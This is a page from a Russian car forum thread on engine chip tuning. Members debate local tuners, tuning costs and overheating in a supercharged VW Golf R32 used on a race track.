+ Ответить в теме
Страница 25 из 81 ПерваяПервая ... 15 23 24 25 26 27 35 75 ... ПоследняяПоследняя
Показано с 241 по 250 из 809

Тема: чип vs чип (подход, особенности, проблемы и т.п.)

Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Машина
    BMW 330D Соляра Power
    Цитата Сообщение от turborabbit Посмотреть сообщение
    ====
    Именно так.
    Просто во первых не все помнят что момент и мощность жёстко связаны между собой и оборотами.
    Так вот такие экселики помогают хомячкам спустицца с небес и перестать мечтать о невозможном. Ибо народ начитавшись форумов начинает оперировать лошадьми и тоннами будто это говно за баней.
    А когда начинает появляться конкретная формулировка чего нужно, тогда начинает создавацца и список модификаций и бюджет.
    Это не выгодно лохотюнерам пытающимся впарить хомячкам ненужные железки. И это не выгодно лохотюнерам не уверенным в результате своих ковыряний отвёрткой в мозгах.
    Но это неотменная часть в постройке расово верных пепелацов.

Добавлено через 3 минуты

====
    Это подход новичка, на котором у лохотюнеров есть отличная возможность заработать.
    Но это очень мало говорит о реальном результате.
    Впрочем, если задача - напечатать красивый график, всунуть в рамочку и поставить в гараже/офисе/на серванте - то этот подход тоже неплох. НО для всего перечисленного обычно нужна 1/3 бюджета который запросят тюнеры.
    Дык понятно, вопрос в другом, нести каляки маляки некому)))))))))))
    Поэтому идешь в булочную и покупаешь либо белый, либо черный, либо булку с маком:) а по факту особо выбора нет:)
    Поэтому довольствуемся тем что есть:) а так с удовольствием бы пришел в адекватную контору и сказал что мне хочется и т.д:)
    Но. . . .:expect:
    BMW 330D POWERED by Dizelboost :pepper:

GTI-Racing turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold Аватар для turborabbit
    Машина
    MKVI GTi 475hp
    Ну вот и начинайте создавать условия. Начинать нужно с себя. "А что делать?" тут не ответ. Нужно искать решения. Возможно заграницей. Вон кто-то тут поехал в Голландию и настроили ему. И фен и шуй. А потом глядишь тот голландец захочет открыть дилерство в рашке. Но пока всё тюнерство сводицца к отмазкам - ничего не изменицца.

III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Машина
    Nissan Quest
    Ну вот и начинайте создавать условия. Начинать нужно с себя. "А что делать?" тут не ответ. Нужно искать решения. Возможно заграницей. Вон кто-то тут поехал в Голландию и настроили ему. И фен и шуй. А потом глядишь тот голландец захочет открыть дилерство в рашке. Но пока всё тюнерство сводицца к отмазкам - ничего не изменицца.
    Какой шуй? ОЖ перегревается на втором круге валилова по автодрому! Налицо недоработка инженеров - настройщиков. Речь идет о mk5 R32 с компрессором.
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

GTI-Racing turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold Аватар для turborabbit
    Машина
    MKVI GTi 475hp
    Цитата Сообщение от Гера Посмотреть сообщение
    Какой шуй? ОЖ перегревается на втором круге валилова по автодрому! Налицо недоработка инженеров - настройщиков. Речь идет о mk5 R32 с компрессором.
    ====
    Об этой проблеме данного авто тут писали раньше?

III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Машина
    Nissan Quest
    ====
    Об этой проблеме данного авто тут писали раньше?
    В теме "советы от turborabbit" - сообщение № 37. Там график. О проблеме перегрева он не написал, но я догадался! :)
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

Машина
    MKVI GTi 475hp
    График я видел, но одна из проблем это то что об этом сразу не написали.
    Соответственно как и не пишут о всех глюкак всех остальных тюнеров.
    Но форумы созданы не только для позитивных эмоций.
    А без нажима/напряжения мало кто будет править косяки.

GTI-Racing Pavel095 is on a distinguished road Аватар для Pavel095
    Машина
    R-Power Carbon Edition
    То что на автодроме при валиве начинают появлятся проблемы это нормальное дело,если брать проф автоспорт то там после каждой гонки перебирают или меняют движок,коробку,резину итд)
    А то что надо начинать каждому с себя это правильно,большинство из нас хотят получить многое ,да ещё чтобы бесплатно,купить забугром и прикрутить здесь.К примеру тоже прикинув все рассходы по тюнингу решил вновь тюниться здесь,а не в известных немецких тюнинг ателье, как итог жду уже незнамо сколько,а по деньгам выходит уже таже сумма что делать забугром,плюс фиг его знаешь ездить будешь или авто будет месяц ремонтироваться,день ездить.
    Наши конечно тюнеры молодцы,к примеру компрессор на Р32 315 сил в Ганзе стоит 20 тыс у.е,в Спортеке вообще предложили прикрутить компрессор VF-Engeneering для Г4 R32 на Г5 R32 ,в ТоталРейс ценник 70 тыс у.е на 3.2 двигатель 700 пони без замены ДСГ пока она не отвалится,вот и выбирай)
    Последний раз редактировалось Pavel095; 16.09.2011 в 00:00.
    There is only one Legend - R32
    VR6 Power is Rulezzz...

Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Машина
    Skoda
    Цитата Сообщение от Гера Посмотреть сообщение
    В теме "советы от turborabbit" - сообщение № 37. Там график. О проблеме перегрева он не написал, но я догадался! :)

это все херня, вообще не проблема................
    Тесное подкапотное и сток система охлаждения решаемый вопрос. проблема с охлаждением всегда выходит последней. Об этом можно прочитать везде и у любого. Пока не поедешь на всю катушку не узнаешь...... и эта катушка у всех по разному может быть )))))

Ну не посоветовали ему в лоб про охлаждение, а может и намекнули, не столь важно, у него в активном драйве по городу нет такого, а в гонках голландцы просто не подозревали, что кто-то может так ехать как Леха, и вообще не вкурили наверное, что это можно на R32 делать, не корчовом )))))
    Тут не стоит забывать, что голландцы ему еще и снизили мощность и перенастроили софт, когда спросили ездит ли он в ралли. Но даже при этом стоит отдать им должное по результатам.
    А до тех пор пока люди будут боятся преодолевать трудности, будут просто чипушки и впуски - выпуски, а в тюнячке проблем по цепочке может выползать. Решать их я думаю, даже приятно, лишь бы деньги были))) Я не говорю уже про кастомс, где почти нет понятия болт-он.
    песок сыпется....не останавливайтесь на достигнутом !

II место Лучший Пилот клуба 2011 deflep will become famous soon enough Аватар для deflep
    Машина
    VW Golf MkV, 2007, BUB*Rotrex, DSG
    Ой, я все пропустил!

Да, у меня есть проблема перегрева. Но, давайте начнем издалека. Во первых на автодроме он у меня перегревался еще до установки компрессора. Вот пруф-линк, что бы не думали, что это я сейчас отмазываю голландцев - http://www.youtube.com/watch?v=b51Pb1JCSKg - там на 7.55 я тупо перестал ехать, потому что стрелка подошла к красной зоне.

Термонагруженность ВР6 - давно известная проблема.

Что касается работы мотора после устанвоки компрессора - то ни в пробках ни на трассе нет проблемы перегрева. Недостаток охлаждения проявляется только на автодромах, когда машина едет у красной зоны, особенно на тех автодромах, где есть небольшие прямики с затычными поворотам на концах - типа всего третьего сектора Мячково.

Я с голландцами уже консультировался на эту тему - было сделано несколько интересных решений, каждое из которых по немного отодвигает проблему. На данный момент надо решить самое сложное, это нормальный маслокуллер. К сожалению, конструкция моего мотора такова, что единственным местом где можно врезаться в маслянную магистраль, где у нее есть хорошее давление, это около фильтра, но там есть свои геморойчики.

ЗЫЖ Я теперь на водке буду ездтить! :) :) Я серьезно!!!
    "Все что не умеет быстро ездить, обязательно должно красиво выглядеть"(с) я
    Wings for Life (c)
    A heart that hurts, Is a heart that... works.

Супер Модератор Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Аватар для Spaceman
    Машина
    GTI Overload
    Цитата Сообщение от deflep Посмотреть сообщение
    ЗЫЖ Я теперь на водке буду ездтить! :) :) Я серьезно!!!
    Поставил все таки?)
    Расскажи как выключатель сделал, просто напрямую и на постоянку?
    Golf V GTI Overload почти сток...

+ Ответить в теме
Страница 25 из 81 ПерваяПервая ... 15 23 24 25 26 27 35 75 ... ПоследняяПоследняя